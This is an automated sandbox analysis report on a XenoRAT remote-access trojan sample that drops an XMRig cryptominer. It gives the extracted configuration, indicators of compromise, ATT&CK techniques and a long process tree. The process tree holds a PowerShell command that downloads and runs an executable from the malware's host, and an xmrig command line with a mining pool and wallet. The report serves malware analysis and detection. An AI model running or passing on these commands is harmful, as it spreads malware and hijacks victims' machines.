xenorat | 2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132

Analysis

max time kernel
51s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
28-03-2024 09:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
Size

451KB
MD5

6614077c77a8182f0307a720071f2197
SHA1

06a06a6d02ad281942ed8b6890f099be54275bb2
SHA256

2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132
SHA512

26b1249631b8762d332b04ccac12faf4e52a4641efa90ff0c13596715c5ef8f4eb08c4e6e32efe551ebf3a3a432a897c33eafa9980dd12eeb65213081f3d77cb
SSDEEP

12288:QLMEalqxXblqoRX5qbfphLxaO3qX+t4SJ:cqaXNabfphLxa4w4

Score

10^/10

xenorat xmrig miner rat spyware stealer trojan

Malware Config

Extracted

Family

xenorat

puredgb.duckdns.org

Mutex

Xeno_rat_nd8912d

Attributes

delay
5000
install_path
appdata
port
4444
startup_name
Fobus.exe

Signatures

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral2/files/0x000e000000023125-67.dat	family_xmrig
behavioral2/files/0x000e000000023125-67.dat	xmrig
behavioral2/memory/4796-103-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-106-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-118-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-155-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-161-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-167-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-169-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-170-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-181-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-216-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-217-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-222-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-224-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig
behavioral2/memory/4796-225-0x00007FF60DA40000-0x00007FF60E53F000-memory.dmp	xmrig

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
8	2556	powershell.exe
16	1624	powershell.exe
21	1288	powershell.exe
48	2860	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	tmp.vbs
Key value queried	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation	2.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk	6.exe

Executes dropped EXE 6 IoCs

pid	Process
2408	6.exe
4796	xmrig.exe
4828	1.exe
2416	tmp.vbs
4212	2.exe
5044	2.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2212	schtasks.exe
2880	schtasks.exe

Delays execution with timeout.exe 59 IoCs

evasion

pid	Process
4932	timeout.exe
4736	timeout.exe
1144	timeout.exe
2020	timeout.exe
1484	timeout.exe
752	timeout.exe
1788	timeout.exe
4528	timeout.exe
3320	timeout.exe
2284	timeout.exe
5048	timeout.exe
4064	timeout.exe
3228	timeout.exe
1728	timeout.exe
1416	timeout.exe
3876	timeout.exe
3724	timeout.exe
5032	timeout.exe
3156	timeout.exe
436	timeout.exe
2172	timeout.exe
1852	timeout.exe
3020	timeout.exe
936	timeout.exe
4904	timeout.exe
3128	timeout.exe
3272	timeout.exe
1448	timeout.exe
1204	timeout.exe
2120	timeout.exe
1996	timeout.exe
4064	timeout.exe
1952	timeout.exe
2480	timeout.exe
4812	timeout.exe
2784	timeout.exe
1628	timeout.exe
1376	timeout.exe
5072	timeout.exe
3224	timeout.exe
1068	timeout.exe
4092	timeout.exe
1216	timeout.exe
2664	timeout.exe
4860	timeout.exe
4948	timeout.exe
4656	timeout.exe
3472	timeout.exe
2800	timeout.exe
2672	timeout.exe
2556	timeout.exe
4136	timeout.exe
5000	timeout.exe
1628	timeout.exe
3984	timeout.exe
1732	timeout.exe
4656	timeout.exe
3124	timeout.exe
1620	timeout.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
2672	tasklist.exe
4256	tasklist.exe
2004	tasklist.exe
3020	tasklist.exe
2480	tasklist.exe
4416	tasklist.exe
652	tasklist.exe
1452	tasklist.exe
4744	tasklist.exe
1996	tasklist.exe
3724	tasklist.exe
2744	tasklist.exe
2252	tasklist.exe
1568	tasklist.exe
4432	tasklist.exe
4736	tasklist.exe
4904	tasklist.exe
1916	tasklist.exe
664	tasklist.exe
1572	tasklist.exe
1492	tasklist.exe
2828	tasklist.exe
4980	tasklist.exe
4064	tasklist.exe
2912	tasklist.exe
3440	tasklist.exe
3768	tasklist.exe
1628	tasklist.exe
3884	tasklist.exe
2040	tasklist.exe
4924	tasklist.exe
4416	tasklist.exe
384	tasklist.exe
1268	tasklist.exe
2960	tasklist.exe
1852	tasklist.exe
4416	tasklist.exe
5084	tasklist.exe
2804	tasklist.exe
3760	tasklist.exe
3720	tasklist.exe
3380	tasklist.exe
1412	tasklist.exe
792	tasklist.exe
3308	tasklist.exe
3600	tasklist.exe
2456	tasklist.exe
4496	tasklist.exe
3876	tasklist.exe
5096	tasklist.exe
752	tasklist.exe
4900	tasklist.exe
5088	tasklist.exe
3772	tasklist.exe
2836	tasklist.exe
3936	tasklist.exe
4792	tasklist.exe
5084	tasklist.exe
5024	tasklist.exe
4672	tasklist.exe
228	tasklist.exe
2688	tasklist.exe
4680	tasklist.exe
3936	tasklist.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings	tmp.vbs
Key created	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings	SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
Key created	\REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings	6.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2556	powershell.exe
2556	powershell.exe
1624	powershell.exe
1624	powershell.exe
1288	powershell.exe
1288	powershell.exe
1288	powershell.exe
2860	powershell.exe
2860	powershell.exe
2860	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious use of AdjustPrivilegeToken 31 IoCs

description	pid	Process
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	364	tasklist.exe
Token: SeDebugPrivilege	436	tasklist.exe
Token: SeDebugPrivilege	4064	tasklist.exe
Token: SeLockMemoryPrivilege	4796	xmrig.exe
Token: SeLockMemoryPrivilege	4796	xmrig.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	4900	tasklist.exe
Token: SeDebugPrivilege	2908	tasklist.exe
Token: SeDebugPrivilege	2688	tasklist.exe
Token: SeDebugPrivilege	3760	tasklist.exe
Token: SeDebugPrivilege	3208	tasklist.exe
Token: SeDebugPrivilege	2912	tasklist.exe
Token: SeDebugPrivilege	640	tasklist.exe
Token: SeDebugPrivilege	1744	tasklist.exe
Token: SeDebugPrivilege	5084	tasklist.exe
Token: SeDebugPrivilege	4664	tasklist.exe
Token: SeDebugPrivilege	4416	tasklist.exe
Token: SeDebugPrivilege	436	tasklist.exe
Token: SeDebugPrivilege	4816	tasklist.exe
Token: SeDebugPrivilege	3020	tasklist.exe
Token: SeDebugPrivilege	228	tasklist.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	1996	tasklist.exe
Token: SeDebugPrivilege	2480	tasklist.exe
Token: SeDebugPrivilege	4904	tasklist.exe
Token: SeDebugPrivilege	4624	tasklist.exe
Token: SeDebugPrivilege	4416	tasklist.exe
Token: SeDebugPrivilege	4136	tasklist.exe
Token: SeDebugPrivilege	3720	tasklist.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4796	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3220 wrote to memory of 2976	3220	SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe	85
PID 3220 wrote to memory of 2976	3220	SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe	85
PID 2976 wrote to memory of 1284	2976	WScript.exe	86
PID 2976 wrote to memory of 1284	2976	WScript.exe	86
PID 1284 wrote to memory of 2556	1284	cmd.exe	88
PID 1284 wrote to memory of 2556	1284	cmd.exe	88
PID 2556 wrote to memory of 2408	2556	powershell.exe	94
PID 2556 wrote to memory of 2408	2556	powershell.exe	94
PID 1284 wrote to memory of 1624	1284	cmd.exe	95
PID 1284 wrote to memory of 1624	1284	cmd.exe	95
PID 2408 wrote to memory of 5084	2408	6.exe	97
PID 2408 wrote to memory of 5084	2408	6.exe	97
PID 5084 wrote to memory of 1980	5084	WScript.exe	98
PID 5084 wrote to memory of 1980	5084	WScript.exe	98
PID 1980 wrote to memory of 364	1980	cmd.exe	100
PID 1980 wrote to memory of 364	1980	cmd.exe	100
PID 1980 wrote to memory of 1380	1980	cmd.exe	101
PID 1980 wrote to memory of 1380	1980	cmd.exe	101
PID 1980 wrote to memory of 2120	1980	cmd.exe	102
PID 1980 wrote to memory of 2120	1980	cmd.exe	102
PID 1980 wrote to memory of 1592	1980	cmd.exe	103
PID 1980 wrote to memory of 1592	1980	cmd.exe	103
PID 1592 wrote to memory of 436	1592	cmd.exe	152
PID 1592 wrote to memory of 436	1592	cmd.exe	152
PID 1980 wrote to memory of 2528	1980	cmd.exe	105
PID 1980 wrote to memory of 2528	1980	cmd.exe	105
PID 1980 wrote to memory of 4064	1980	cmd.exe	128
PID 1980 wrote to memory of 4064	1980	cmd.exe	128
PID 1980 wrote to memory of 2616	1980	cmd.exe	107
PID 1980 wrote to memory of 2616	1980	cmd.exe	107
PID 2528 wrote to memory of 5076	2528	WScript.exe	108
PID 2528 wrote to memory of 5076	2528	WScript.exe	108
PID 1980 wrote to memory of 2672	1980	cmd.exe	110
PID 1980 wrote to memory of 2672	1980	cmd.exe	110
PID 5076 wrote to memory of 4796	5076	cmd.exe	111
PID 5076 wrote to memory of 4796	5076	cmd.exe	111
PID 1624 wrote to memory of 4828	1624	powershell.exe	113
PID 1624 wrote to memory of 4828	1624	powershell.exe	113
PID 1284 wrote to memory of 1288	1284	cmd.exe	114
PID 1284 wrote to memory of 1288	1284	cmd.exe	114
PID 1980 wrote to memory of 4464	1980	cmd.exe	115
PID 1980 wrote to memory of 4464	1980	cmd.exe	115
PID 4828 wrote to memory of 1744	4828	1.exe	142
PID 4828 wrote to memory of 1744	4828	1.exe	142
PID 4464 wrote to memory of 4900	4464	cmd.exe	116
PID 4464 wrote to memory of 4900	4464	cmd.exe	116
PID 1744 wrote to memory of 2416	1744	cmd.exe	119
PID 1744 wrote to memory of 2416	1744	cmd.exe	119
PID 2416 wrote to memory of 2056	2416	tmp.vbs	174
PID 2416 wrote to memory of 2056	2416	tmp.vbs	174
PID 2056 wrote to memory of 4912	2056	WScript.exe	185
PID 2056 wrote to memory of 4912	2056	WScript.exe	185
PID 1980 wrote to memory of 2908	1980	cmd.exe	153
PID 1980 wrote to memory of 2908	1980	cmd.exe	153
PID 1980 wrote to memory of 2856	1980	cmd.exe	126
PID 1980 wrote to memory of 2856	1980	cmd.exe	126
PID 4912 wrote to memory of 3312	4912	cmd.exe	127
PID 4912 wrote to memory of 3312	4912	cmd.exe	127
PID 1980 wrote to memory of 4064	1980	cmd.exe	128
PID 1980 wrote to memory of 4064	1980	cmd.exe	128
PID 1980 wrote to memory of 2364	1980	cmd.exe	129
PID 1980 wrote to memory of 2364	1980	cmd.exe	129
PID 2364 wrote to memory of 2688	2364	cmd.exe	130
PID 2364 wrote to memory of 2688	2364	cmd.exe	130

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3220
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\down.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\down.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\6.exe'; C:\Users\Admin\AppData\Roaming\6.exe"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2556
    - - C:\Users\Admin\AppData\Roaming\6.exe
        
        "C:\Users\Admin\AppData\Roaming\6.exe"
        5⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:2408
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:5084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
        7⤵
        Checks computer location settings
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:1980
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:364
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1380
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1592
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:436
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs"
        8⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:5076
        
        C:\ProgramData\Drivers\xmrig.exe
        
        xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4796
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4064
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2616
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4464
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4900
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2908
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2856
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4064
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2364
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2688
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3760
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:460
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:5072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1372
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3208
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2912
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1788
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4988
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:640
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4524
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:440
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5084
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4664
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2212
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4908
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4416
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:436
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2908
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2876
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4816
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3020
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:3876
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1168
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:228
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1996
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4036
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4956
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2480
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4904
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:836
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2744
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4624
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4416
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4324
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4924
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4136
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3720
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1464
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4912
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        
        PID:3876
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:4496
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1080
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4568
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:4564
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:384
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2792
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3640
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:2292
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        
        PID:2672
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1160
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:332
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        
        PID:764
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        
        PID:2868
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2864
        
